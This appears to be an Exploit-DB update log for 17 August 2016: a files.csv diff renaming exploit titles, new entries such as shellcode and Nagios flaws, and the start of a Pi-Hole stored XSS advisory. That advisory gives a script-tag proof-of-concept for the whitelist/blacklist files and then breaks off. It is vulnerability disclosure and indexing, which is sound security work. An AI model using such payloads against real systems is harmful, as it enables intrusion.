DB: 2016-08-17

10 new exploits

Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service Exploit
Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service

LifeType 1.0.4 - SQL Injection / Admin Credentials Disclosure Exploit
LifeType 1.0.4 - Multiple Vulnerabilities

Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote DoS Exploit
Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote Denial of Service
cms-bandits 2.5 - (spaw_root) Remote File Inclusion
Enterprise Payroll Systems 1.1 - (footer) Remote Include
CMS-Bandits 2.5 - (spaw_root) Remote File Inclusion
Enterprise Payroll Systems 1.1 - (footer) Remote File Inclusion
0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash Exploit
empris r20020923 - (phormationdir) Remote Include
aePartner 0.8.3 - (dir[data]) Remote Include
0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash PoC
empris r20020923 - (phormationdir) Remote File Inclusion
aePartner 0.8.3 - (dir[data]) Remote File Inclusion
SmartSiteCMS 1.0 - (root) Remote File Inclusion
Opera 9 - (long href) Remote Denial of Service Exploit
SmartSite CMS 1.0 - (root) Remote File Inclusion
Opera 9 - (long href) Remote Denial of Service

w-Agora 4.2.0 - (inc_dir) Remote File Inclusion Exploit
w-Agora 4.2.0 - (inc_dir) Remote File Inclusion

BitchX 1.1-final do_hook() Remote Denial of Service Exploit
BitchX 1.1-final - do_hook() Remote Denial of Service

BLOG:CMS 4.0.0k SQL Injection Exploit
BLOG:CMS 4.0.0k - SQL Injection

Sun Board 1.00.00 alpha Remote File Inclusion
Sun Board 1.00.00 alpha - Remote File Inclusion

Mailist 3.0 Insecure Backup/Local File Inclusion
Mailist 3.0 - Insecure Backup/Local File Inclusion

AdaptCMS 2.0.0 Beta (init.php) Remote File Inclusion
AdaptCMS 2.0.0 Beta - (init.php) Remote File Inclusion
VisualShapers ezContents 1.x/2.0 db.php Arbitrary File Inclusion
VisualShapers ezContents 1.x/2.0 archivednews.php Arbitrary File Inclusion
VisualShapers ezContents 1.x/2.0 - db.php Arbitrary File Inclusion
VisualShapers ezContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion

VoteBox 2.0 Votebox.php Remote File Inclusion
VoteBox 2.0 - Votebox.php Remote File Inclusion

TRG News 3.0 Script Remote File Inclusion
TRG News 3.0 Script - Remote File Inclusion

Vortex Portal 2.0 content.php act Parameter Remote File Inclusion
Vortex Portal 2.0 - content.php act Parameter Remote File Inclusion

Shoutbox 1.0 Shoutbox.php Remote File Inclusion
Shoutbox 1.0 - Shoutbox.php Remote File Inclusion

Ajaxmint Gallery 1.0 Local File Inclusion
Ajaxmint Gallery 1.0 - Local File Inclusion
Zabbix 2.2.x_ 3.0.x - SQL Injection
Microsoft Office Word 2013_2016 - sprmSdyaTop Denial of Service (MS16-099)
Zabbix 2.2.x / 3.0.x - SQL Injection
Microsoft Office Word 2013/2016 - sprmSdyaTop Denial of Service (MS16-099)
Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use After Free PoC
Windows x86 - MessageBoxA Shellcode (242 bytes)
Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)
Lepton CMS 2.2.0 / 2.2.1 - Directory Traversal
Lepton CMS 2.2.0 / 2.2.1 - PHP Code Injection
Pi-Hole Web Interface 2.8.1 - Stored XSS in Whitelist/Blacklist
Nagios Log Server 1.4.1 - Multiple Vulnerabilities
Nagios Network Analyzer 2.2.0 - Multiple Vulnerabilities
Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities
Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV

files.csv

@@ -1575,20 +1575,20 @@ id,file,description,date,author,platform,type,port
 1864,platforms/php/webapps/1864.txt,"ashNews 0.83 - (pathtoashnews) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0
 1865,platforms/php/webapps/1865.txt,"Informium 0.12.0 - (common-menu.php) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0
 1866,platforms/php/webapps/1866.txt,"PHP-Nuke 7.9 Final (phpbb_root_path) Remote File Inclusions",2006-06-02,ddoshomo,php,webapps,0
-1867,platforms/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service Exploit",2006-06-02,n00b,multiple,dos,0
+1867,platforms/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service",2006-06-02,n00b,multiple,dos,0
 1868,platforms/php/webapps/1868.php,"Pixelpost 1-5rc1-2 - Remote Privilege Escalation Exploit",2006-06-03,rgod,php,webapps,0
 1869,platforms/php/webapps/1869.php,"DotClear 1.2.4 - (prepend.php) Arbitrary Remote Inclusion Exploit",2006-06-03,rgod,php,webapps,0
 1870,platforms/php/webapps/1870.txt,"BlueShoes Framework 4.6 - Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
 1871,platforms/php/webapps/1871.txt,"WebspotBlogging 3.0.1 - (path) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
 1872,platforms/php/webapps/1872.txt,"CS-Cart 1.3.3 - (classes_dir) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
 1873,platforms/asp/webapps/1873.txt,"ProPublish 2.0 - (catid) SQL Injection",2006-06-03,FarhadKey,asp,webapps,0
-1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - SQL Injection / Admin Credentials Disclosure Exploit",2006-06-03,rgod,php,webapps,0
+1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - Multiple Vulnerabilities",2006-06-03,rgod,php,webapps,0
 1875,platforms/php/webapps/1875.htm,"FunkBoard CF0.71 - (profile.php) Remote User Pass Change Exploit",2006-06-04,ajann,php,webapps,0
 1876,platforms/php/webapps/1876.pl,"SCart 2.0 - (page) Remote Code Execution Exploit",2006-06-04,K-159,php,webapps,0
 1877,platforms/php/webapps/1877.php,"Claroline 1.7.6 - (includePath) Remote Code Execution Exploit",2006-06-05,rgod,php,webapps,0
 1878,platforms/php/webapps/1878.txt,"Particle Wiki 1.0.2 - SQL Injection",2006-06-05,FarhadKey,php,webapps,0
 1879,platforms/php/webapps/1879.txt,"dotWidget CMS 1.0.6 - (file_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0
-1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote DoS Exploit",2006-06-05,"ECL Labs",linux,dos,0
+1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote Denial of Service",2006-06-05,"ECL Labs",linux,dos,0
 1881,platforms/php/webapps/1881.txt,"DreamAccount 3.1 - (da_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0
 1882,platforms/php/webapps/1882.pl,"Dmx Forum 2.1a (edit.php) Remote Password Disclosure Exploit",2006-06-05,DarkFig,php,webapps,0
 1883,platforms/php/webapps/1883.txt,"Wikiwig 4.1 - (wk_lang.php) Remote File Inclusion",2006-06-06,Kacper,php,webapps,0
@@ -1598,13 +1598,13 @@ id,file,description,date,author,platform,type,port
 1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News 1.0 - (post.php) Remote File Inclusion",2006-06-07,Kacper,php,webapps,0
 1888,platforms/php/webapps/1888.txt,"Back-End CMS 0.7.2.1 - (jpcache.php) Remote Include",2006-06-08,"Federico Fazzi",php,webapps,0
 1889,platforms/hardware/remote/1889.txt,"D-Link Access-Point 2.10na - (DWL Series) Config Disclosure",2006-06-08,INTRUDERS,hardware,remote,0
-1890,platforms/php/webapps/1890.txt,"cms-bandits 2.5 - (spaw_root) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0
+1890,platforms/php/webapps/1890.txt,"CMS-Bandits 2.5 - (spaw_root) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0
-1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - (footer) Remote Include",2006-06-08,Kacper,php,webapps,0
+1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - (footer) Remote File Inclusion",2006-06-08,Kacper,php,webapps,0
 1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 - (email) Remote Code Execution Exploit",2006-06-08,K-sPecial,php,webapps,0
 1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise 2.0 - (ASP) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0
-1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash Exploit",2006-06-09,"Federico Fazzi",linux,dos,0
+1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash PoC",2006-06-09,"Federico Fazzi",linux,dos,0
-1895,platforms/php/webapps/1895.txt,"empris r20020923 - (phormationdir) Remote Include",2006-06-10,Kacper,php,webapps,0
+1895,platforms/php/webapps/1895.txt,"empris r20020923 - (phormationdir) Remote File Inclusion",2006-06-10,Kacper,php,webapps,0
-1896,platforms/php/webapps/1896.txt,"aePartner 0.8.3 - (dir[data]) Remote Include",2006-06-10,Kacper,php,webapps,0
+1896,platforms/php/webapps/1896.txt,"aePartner 0.8.3 - (dir[data]) Remote File Inclusion",2006-06-10,Kacper,php,webapps,0
 1897,platforms/php/webapps/1897.txt,"phpOnDirectory 1.0 - Remote File Inclusion",2006-06-10,Kacper,php,webapps,0
 1898,platforms/php/webapps/1898.txt,"WebprojectDB 0.1.3 - (INCDIR) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0
 1899,platforms/php/webapps/1899.txt,"free QBoard 1.1 - (qb_path) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0
@@ -1645,7 +1645,7 @@ id,file,description,date,author,platform,type,port
 1934,platforms/php/webapps/1934.txt,"dotProject 2.0.3 - (baseDir) Remote File Inclusion",2006-06-20,h4ntu,php,webapps,0
 1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - (Midi File Header Handling) Buffer Overflow PoC",2006-06-20,BassReFLeX,windows,dos,0
 1936,platforms/php/webapps/1936.txt,"SmartSite CMS 1.0 - (root) Remote File Inclusion",2006-06-20,Archit3ct,php,webapps,0
-1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0
+1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service",2006-06-21,N9,multiple,dos,0
 1938,platforms/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0
 1939,platforms/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection Exploit (PHP)",2006-06-21,RusH,php,webapps,0
 1940,platforms/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025) (Metasploit)",2006-06-22,"H D Moore",windows,remote,445
@@ -1653,9 +1653,9 @@ id,file,description,date,author,platform,type,port
 1942,platforms/php/webapps/1942.txt,"ralf image gallery 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0
 1943,platforms/php/webapps/1943.txt,"Harpia CMS 1.0.5 - Remote File Inclusion",2006-06-22,Kw3[R]Ln,php,webapps,0
 1944,platforms/windows/local/1944.c,"Microsoft Excel Unspecified Remote Code Execution Exploit",2006-06-22,"naveed afzal",windows,local,0
-1945,platforms/php/webapps/1945.pl,"w-Agora 4.2.0 - (inc_dir) Remote File Inclusion Exploit",2006-06-22,the_day,php,webapps,0
+1945,platforms/php/webapps/1945.pl,"w-Agora 4.2.0 - (inc_dir) Remote File Inclusion",2006-06-22,the_day,php,webapps,0
 1946,platforms/php/webapps/1946.php,"Jaws 0.6.2 - (Search gadget) SQL Injection Exploit",2006-06-23,rgod,php,webapps,0
-1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final do_hook() Remote Denial of Service Exploit",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0
+1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final - do_hook() Remote Denial of Service",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0
 1948,platforms/php/webapps/1948.txt,"phpMySms 2.0 - (ROOT_PATH) Remote File Inclusion",2006-06-24,Persian-Defacer,php,webapps,0
 1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - (Port) Remote Overflow PoC",2006-06-24,"Jerome Athias",windows,dos,0
 1950,platforms/php/webapps/1950.pl,"MyBulletinBoard (MyBB) 1.1.3 - (usercp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0
@@ -1668,7 +1668,7 @@ id,file,description,date,author,platform,type,port
 1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - (forumid) SQL Injection Exploit",2006-06-27,simo64,php,webapps,0
 1958,platforms/windows/local/1958.pl,"Microsoft Excel 2003 Hlink Stack/SEH Buffer Overflow Exploit",2006-06-27,FistFuXXer,windows,local,0
 1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - (rsgallery.html.php) File Include",2006-06-28,marriottvn,php,webapps,0
-1960,platforms/php/webapps/1960.php,"BLOG:CMS 4.0.0k SQL Injection Exploit",2006-06-28,rgod,php,webapps,0
+1960,platforms/php/webapps/1960.php,"BLOG:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps,0
 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) SQL Injection",2006-06-28,KeyCoder,php,webapps,0
 1962,platforms/osx/local/1962.pl,"Mac OS X 10.4.6 - (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0
 1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0
@@ -3739,7 +3739,7 @@ id,file,description,date,author,platform,type,port
 4087,platforms/linux/remote/4087.c,"BitchX 1.1-final (EXEC) Remote Command Execution Exploit",2007-06-21,clarity_,linux,remote,0
 4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 - (load_lang.php) Remote File Inclusion Exploit",2007-06-21,Kw3[R]Ln,php,webapps,0
 4090,platforms/php/webapps/4090.pl,"Powl 0.94 - (htmledit.php) Remote File Inclusion",2007-06-22,Kw3[R]Ln,php,webapps,0
-4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0
+4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha - Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0
 4092,platforms/php/webapps/4092.txt,"netclassifieds - (SQL/XSS/full path) Multiple Vulnerabilities",2007-06-22,"laurent gaffié ",php,webapps,0
 4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow Exploit",2007-06-22,eliteboy,multiple,remote,80
 4094,platforms/windows/remote/4094.html,"BarCode ActiveX Control BarCodeAx.dll 4.9 - Remote Overflow Exploit",2007-06-22,callAX,windows,remote,0
@@ -7528,7 +7528,7 @@ id,file,description,date,author,platform,type,port
 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0
 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution Exploit",2009-02-06,Osirys,php,webapps,0
 8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0
-8001,platforms/php/webapps/8001.txt,"Mailist 3.0 Insecure Backup/Local File Inclusion",2009-02-06,SirGod,php,webapps,0
+8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup/Local File Inclusion",2009-02-06,SirGod,php,webapps,0
 8002,platforms/php/webapps/8002.txt,"CafeEngine - (index.php catid) SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0
 8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with RFI (c99) Exploit",2009-02-06,JosS,php,webapps,0
 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - (Auth Bypass/LFI/RCE) Multiple Vulnerabilities",2009-02-06,x0r,php,webapps,0
@@ -12348,7 +12348,7 @@ id,file,description,date,author,platform,type,port
 14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Remote Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0
 14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0
 14015,platforms/php/webapps/14015.txt,"2DayBiz photo sharing Script - SQL Injection",2010-06-24,JaMbA,php,webapps,0
-14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta (init.php) Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0
+14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - (init.php) Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0
 14017,platforms/php/webapps/14017.txt,"Joomla Component com_realtyna - LFI",2010-06-24,MISTERFRIBO,php,webapps,0
 14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0
 14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL injection",2010-06-24,Sangteamtham,php,webapps,0
@@ -20898,8 +20898,8 @@ id,file,description,date,author,platform,type,port
 23680,platforms/php/webapps/23680.php,"PHP-Nuke 6.x - Category Parameter SQL Injection",2003-12-23,pokleyzz,php,webapps,0
 23681,platforms/windows/dos/23681.pl,"EvolutionX Multiple Remote Buffer Overflow Vulnerabilities",2004-02-10,Moth7,windows,dos,0
 23682,platforms/linux/local/23682.c,"XFree86 4.3 Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,linux,local,0
-23683,platforms/php/webapps/23683.txt,"VisualShapers ezContents 1.x/2.0 db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
+23683,platforms/php/webapps/23683.txt,"VisualShapers ezContents 1.x/2.0 - db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
-23684,platforms/php/webapps/23684.txt,"VisualShapers ezContents 1.x/2.0 archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
+23684,platforms/php/webapps/23684.txt,"VisualShapers ezContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
 23685,platforms/php/webapps/23685.txt,"BosDev BosDates 3.x - SQL Injection",2004-02-11,G00db0y,php,webapps,0
 23696,platforms/asp/webapps/23696.pl,"ASP Portal - Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0
 23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x - info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
@@ -22367,7 +22367,7 @@ id,file,description,date,author,platform,type,port
 25223,platforms/php/webapps/25223.txt,"Phorum 5.0.14 - Multiple Subject and Attachment HTML Injection Vulnerabilities",2005-03-14,"Jon Oberheide",php,webapps,0
 25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 Guestbook.php SQL Injection",2005-03-14,visus,php,webapps,0
 25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 AdFrame.php Cross-Site Scripting",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0
-25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0
+25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 - Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0
 25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 PoC_loginform.php phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
 25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 PoC.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
 25229,platforms/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 ENGLISH_poc.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
@@ -22384,7 +22384,7 @@ id,file,description,date,author,platform,type,port
 25240,platforms/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 register.php login Parameter SQL Injection",2005-03-19,Romano,php,webapps,0
 25241,platforms/php/webapps/25241.html,"PHP-Fusion 4/5 Setuser.php HTML Injection",2005-03-19,"PersianHacker Team",php,webapps,0
 25242,platforms/php/webapps/25242.txt,"Ciamos 0.9.2 Highlight.php File Disclosure",2005-03-19,"Majid NT",php,webapps,0
-25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0
+25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script - Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0
 25244,platforms/php/webapps/25244.txt,"CzarNews 1.13/1.14 headlines.php Remote File Inclusion",2005-03-21,brOmstar,php,webapps,0
 25245,platforms/php/webapps/25245.txt,"Social Site Generator 2.2 - CSRF Add Admin Exploit",2013-05-06,Fallaga,php,webapps,0
 25247,platforms/php/webapps/25247.txt,"Craigslist Gold - SQL Injection",2013-05-06,Fallaga,php,webapps,0
@@ -22401,7 +22401,7 @@ id,file,description,date,author,platform,type,port
 25258,platforms/php/webapps/25258.txt,"Phorum 3.x/5.0.x - HTTP Response Splitting",2005-03-22,"Alexander Anisimov",php,webapps,0
 25259,platforms/windows/dos/25259.py,"Microsoft Windows XP Local Denial of Service",2005-03-22,liquid@cyberspace.org,windows,dos,0
 25260,platforms/php/webapps/25260.txt,"Vortex Portal 2.0 - index.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0
-25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 content.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0
+25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 - content.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0
 25262,platforms/php/webapps/25262.txt,"InterSpire ArticleLive 2005 NewComment Cross-Site Scripting",2005-03-23,mircia,php,webapps,0
 25263,platforms/php/webapps/25263.txt,"DigitalHive 2.0 msg.php XSS",2005-03-23,"benji lemien",php,webapps,0
 25264,platforms/php/webapps/25264.txt,"DigitalHive 2.0 membres.php mt Parameter XSS",2005-03-23,"benji lemien",php,webapps,0
@@ -27370,7 +27370,7 @@ id,file,description,date,author,platform,type,port
 30476,platforms/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80
 30477,platforms/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Local Privilege Escalation",2013-12-24,LiquidWorm,windows,local,0
 30478,platforms/php/webapps/30478.txt,"php MBB CMS 004 - Multiple Vulnerabilities",2013-12-24,"cr4wl3r ",php,webapps,80
-30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 Shoutbox.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
+30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 - Shoutbox.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
 30480,platforms/php/webapps/30480.txt,"Bilder Galerie 1.0 - Index.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
 30481,platforms/php/webapps/30481.txt,"Web News 1.1 - index.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
 30482,platforms/php/webapps/30482.txt,"Web News 1.1 - feed.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
@@ -33637,7 +33637,7 @@ id,file,description,date,author,platform,type,port
 37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 - 'index.php' Cross-Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0
 37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps,0
 37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0
-37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 Local File Inclusion",2012-05-23,AkaStep,php,webapps,0
+37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 - Local File Inclusion",2012-05-23,AkaStep,php,webapps,0
 37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - module.php Multiple Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
 37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 modules.php URI XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
 37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
@@ -36386,9 +36386,19 @@ id,file,description,date,author,platform,type,port
 40234,platforms/windows/remote/40234.py,"Easy FTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0
 40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0
 40236,platforms/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,ruby,webapps,80
-40237,platforms/php/webapps/40237.txt,"Zabbix 2.2.x_ 3.0.x - SQL Injection",2016-08-15,1n3,php,webapps,0
+40237,platforms/php/webapps/40237.txt,"Zabbix 2.2.x / 3.0.x - SQL Injection",2016-08-15,1n3,php,webapps,0
-40238,platforms/multiple/dos/40238.txt,"Microsoft Office Word 2013_2016 - sprmSdyaTop Denial of Service (MS16-099)",2016-08-16,COSIG,multiple,dos,0
+40238,platforms/multiple/dos/40238.txt,"Microsoft Office Word 2013/2016 - sprmSdyaTop Denial of Service (MS16-099)",2016-08-16,COSIG,multiple,dos,0
 40239,platforms/jsp/webapps/40239.txt,"WSO2 Identity Server 5.1.0 - Multiple Vulnerabilities",2016-08-16,hyp3rlinx,jsp,webapps,0
 40240,platforms/jsp/webapps/40240.txt,"WSO2 Carbon 4.4.5 - Local File Inclusion",2016-08-16,hyp3rlinx,jsp,webapps,9443
 40241,platforms/jsp/webapps/40241.txt,"WSO2 Carbon 4.4.5 - Stored XSS",2016-08-16,hyp3rlinx,jsp,webapps,9443
 40242,platforms/jsp/webapps/40242.txt,"WSO2 Carbon 4.4.5 - (Denial of Service) CSRF",2016-08-16,hyp3rlinx,jsp,webapps,9443
+40243,platforms/osx/dos/40243.html,"Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use After Free PoC",2013-04-04,"Google Security Research",osx,dos,0
+40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
+40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
+40247,platforms/php/webapps/40247.txt,"Lepton CMS 2.2.0 / 2.2.1 - Directory Traversal",2016-08-16,hyp3rlinx,php,webapps,80
+40248,platforms/php/webapps/40248.txt,"Lepton CMS 2.2.0 / 2.2.1 - PHP Code Injection",2016-08-16,hyp3rlinx,php,webapps,80
+40249,platforms/linux/webapps/40249.txt,"Pi-Hole Web Interface 2.8.1 - Stored XSS in Whitelist/Blacklist",2016-08-16,loneferret,linux,webapps,0
+40250,platforms/php/webapps/40250.txt,"Nagios Log Server 1.4.1 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0
+40251,platforms/php/webapps/40251.txt,"Nagios Network Analyzer 2.2.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0
+40252,platforms/php/webapps/40252.txt,"Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0
+40253,platforms/windows/dos/40253.html,"Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV",2016-08-16,"Google Security Research",windows,dos,0

platforms/linux/webapps/40249.txt

@@ -0,0 +1,50 @@
+# Exploit Title: Pi-Hole Web Interface Stored XSS in White/Black list file
+# Author: loneferret from Kioptrix
+# Product: Pi-Hole
+# Version: Web Interface 1.3
+# Web Interface software: https://github.com/pi-hole/AdminLTE
+# Version: Pi-Hole v2.8.1
+# Discovery date: July 20th 2016
+# Vendor Site: https://pi-hole.net
+# Software Download: https://github.com/pi-hole/pi-hole
+# Tested on: Ubuntu 14.04
+# Solution: Update to next version.
+ 
+# Software description:
+# The Pi-hole is an advertising-aware DNS/Web server. If an ad domain is queried,
+# a small Web page or GIF is delivered in place of the advertisement.
+# You can also replace ads with any image you want since it is just a simple
+# Webpage taking place of the ads.
+
+# Note: Not much of a vulnerability, implies you already have access
+#       to the box to begin with. Still best to use good coding practices,
+#       and avoid such things.
+
+# Vulnerability PoC: Stored XSS
+# Insert this:
+# <script>alert('This happens...');</script>
+# In either /etc/pihole/blacklist.txt || /etc/pihole/whitelist.txt
+#
+# Then navigate to:
